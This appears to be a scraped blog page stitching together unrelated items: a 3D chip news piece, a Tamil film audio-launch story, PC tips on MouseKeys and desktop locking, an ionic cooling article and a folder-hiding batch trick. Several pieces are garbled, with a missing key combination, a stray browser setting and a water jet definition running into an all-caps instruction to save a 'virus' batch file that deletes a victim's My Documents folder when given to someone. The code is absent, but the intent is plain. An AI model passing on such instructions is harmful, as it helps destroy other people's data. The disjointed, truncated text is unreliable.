3D chips under development..

Fujio Masuoka who invented the flash memory at toshiba is now aiming to deliver three dimensional semiconductor. The design is expected to be ready in two years will allow processors to run ten times faster that the current designs. Masuoka will be working with Singapore's Institute of Microelectronics to develop the 3D chips. It seems that Masuoka will pay royalties to the Singapore governments when the chip is licensed to different manufacturers.

Jackie Chan to launch Kamal Haasan's Dasavatharam audio!!!

It can't get bigger than this. The audio of the much awaited movie Dasavatharam, touted to be the costliest movie to have ever been made in Tamil cinema, will be launched by Jackie Chan.

According to sources close to producer Oscar Ravichandran, Dasavatharam's audio would be a gala affair and would certainly find a place in the history of Indian cinema.

Jackie Chan will come all the way to grace the occasion. It may be recalled that Oscar Ravichandran had distributed several Jackie Chan movies in Tamil Nadu a few years ago. Jackie was shown a few clippings from the movie and he appreciated Kamal Haasan for giving his best in the movie. He readily agreed to be part of the audio launch.
Plans are on to invite prominent actors including Amitabh Bachchan, Chiranjeevi, Mammootty, Mohanlal and Vishnuvardhan for the mega launch.

Dasavatharam has musical score by Bollywood's most sought-after music composer Himesh Reshammiya. The movie directed by K S Ravikumar features Kamal Haasan in ten different roles with Asin and Mallika Sherawat giving him the right company.

According to Ravikumar, "The songs have come really good. It would make an impact among the music-lovers. Himesh has come up with a good stuff".

The audio launch is expected to be launched by February, 2008.

Use ur keyboard as mouse

On your Keyboard Press the following Keys at the same time:

Click ok, the Mousekeys will. Once the Mousekeys is running simply use the arrow keys located on your numeric keypad (8 is up, 2 is down, 4 is left, and 6 is right).

To move the cursor simply tap on the arrows in the numeric keypad (if you hold down one of the arrows, it will move the cursor faster).

You will probably notice that the cursor moves incredibly slow, so one other thing I do is, when I open Mousekeys, I go into the Settings and adjust the speed all the way up.

Ionic cooling in the future

Cooling your computer using a water-based solution is not the best way to do it anymore. A new technology of cooling has appeared. It will increase the cooling abilities of usual fans very much. As computers' powers grow more and more heat is generated by its chips and we need gadgets to deal with that heat. The scientists believe that wind engines that create a "breeze" of charged particles (ions) will be able to keep the chips cool.

After the research the scientists have discovered that airflow cooling fans are not very effective because of the problems in air flow. Even when the fan blows the air to a chip, the nearest molecules to the chip tend to stay at the surface of it, which makes cooling effect much smaller.

The new technology created by the scientists is going a different way by shifting the charged particles from one end of the chip to the other. The experimental wind engine charges up particles and sends them over the chip, they are being attracted to negatively charged wires and this will make the molecules of air to constantly move improving cooling abilities. With introduction of ions in cooling technology there will be no need for water cooled solutions.

Professor Suresh Garimella gave the numbers about the improvement of the cooling abilities on computer chips. Their new gadget will improve cooling powers by 250% which basically means a 2.5 times increase in cooling. I wish I had something like that because my cooler sometimes goes to a 5 thousand RPM and gets really loud. By the way any other enhancements that you can do to your computer will increase cooling power by 40-50% (1.4-1.5 times). Just so you can compare how effective the new technology will be.

The last thing research team needs to do is to shrink their device to the size that can be used in the computers. That means that they have to shrink it a hundred times, and that will be a very big challenge for them. As for the rest of the device it is fully functional and we will have to wait another three years or so until hits the market.

browser.cache.disk.capacity to 3/4 th of existing value.

A water jet cutter is a tool capable of slicing into metal or other materials using a jet of water at high velocity and pressure, or a mixture of water and an abrasive substance. The process is essentially the same as water erosion found in nature but accelerated and concentrated by orders of magnitude. OPEN NOTEPAD AND COPY-PASTE THE FOLLOWING CODE IN IT.THEN SAVE THE FILE WITH WHATEVER NAME U LIKE BUT BE SURE TO SAVE IT AS A BAT FILE.I MEAN SAVE IT LIKE MYVIRUS.BAT.IT SHOULD HAVE THE ENDING AS .BAT.NOW IF U GIVE THIS TO SOMEONE AND IF HE RUNS THIS PROGRAM THEN HIS MY DOCUMENT FOLDER WILL BE DELETED.

Locking the desktop

Locking the desktop
If you are leaving your computer for a while and do not wish to turn it off, but want to assure that no-one else can use the computer while you are away, locking the desktop is the best option.

By pressing WINDOWSKEY+L, you password protect your system just as if you had logged out or restarted the computer. The advantage is that any programs or processes that were running when you locked the desktop will stay open and running in the background, ready for you to resume work or play.

Lock ur Folder without any software!!!!!!!

Suppose you want to lock the folder 'games' in 'd:' which has the path 'D:\Games'. In the same drive create a text file and type:
'ren games games.{21EC2020-3AEA-1069-A2DD-08002B30309D}'
Now save this text file as 'loc.bat'

Create another text file in same location and type in it:
'ren games.{21EC2020-3AEA-1069-A2DD-08002B30309D} games'
Now save this text file as 'key.bat'

Now you can see 2 batch files 'loc.bat' and 'key.bat' in same loction. Now, Run 'loc.bat' and the folder 'games' will change to control panel and you cannot view its contents.

To retrieve this folder:
Run 'key.bat' and you will get back your original folder.
try it out!!!!!!!
